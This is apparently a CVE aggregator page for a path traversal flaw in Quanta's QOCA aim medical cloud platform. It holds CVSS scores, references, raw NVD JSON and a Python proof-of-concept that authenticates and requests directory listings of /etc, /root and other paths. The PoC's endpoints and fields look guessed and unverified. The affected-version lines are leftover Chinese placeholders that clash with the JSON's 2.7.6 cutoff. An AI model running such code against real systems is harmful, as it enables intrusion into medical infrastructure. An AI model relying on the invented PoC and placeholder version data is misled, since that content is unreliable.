CVE-2025-15236

Description

QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a Path Traversal vulnerability, allowing authenticated remote attackers to read folder names under the specified path by exploiting an Absolute Path Traversal vulnerability.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:quantatw:qoca_aim:*:*:*:*:*:*:*:* - VULNERABLE

QOCA aim AI Medical Cloud Platform < 修复版本

Quanta Computer QOCA aim 特定版本（具体版本号待官方披露）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-15236 PoC - QOCA aim AI Medical Cloud Platform Path Traversal
# Authentication Required: Yes (Low Privilege)
# Target: Read directory names via Absolute Path Traversal

import requests
import json

TARGET_URL = "https://<target-ip>/api/"
USERNAME = "attacker"
PASSWORD = "password"

# Step 1: Authentication
login_url = TARGET_URL + "auth/login"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}

session = requests.Session()
response = session.post(login_url, json=login_data, verify=False)

if response.status_code != 200:
    print(f"[-] Authentication failed: {response.status_code}")
    exit(1)

print("[+] Authentication successful")
token = response.json().get("token")

# Step 2: Path Traversal Exploitation
# Try to read directory listing via absolute path traversal
headers = {
    "Authorization": f"Bearer {token}",
    "Content-Type": "application/json"
}

# Target paths to enumerate
test_paths = [
    "/etc",
    "/var/log",
    "/opt",
    "/home",
    "/root"
]

for path in test_paths:
    exploit_url = TARGET_URL + "files/list"
    exploit_data = {
        "path": path,
        "recursive": True
    }
    
    response = session.post(exploit_url, json=exploit_data, headers=headers, verify=False)
    
    if response.status_code == 200:
        result = response.json()
        print(f"\n[+] Directory listing for {path}:")
        print(json.dumps(result, indent=2))
    else:
        print(f"[-] Failed to access {path}: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15236
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15236
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15236/
[4] VulDB https://vuldb.com/cve/CVE-2025-15236
[5] https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15236", "sourceIdentifier": "[email protected]", "published": "2026-01-05T08:15:57.443", "lastModified": "2026-01-20T21:15:07.423", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a Path Traversal vulnerability, allowing authenticated remote attackers to read folder names under the specified path by exploiting an Absolute Path Traversal vulnerability."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-36"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quantatw:qoca_aim:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.6", "matchCriteriaId": "4D325141-836B-4D68-87D4-9E4BD8F2A80F"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}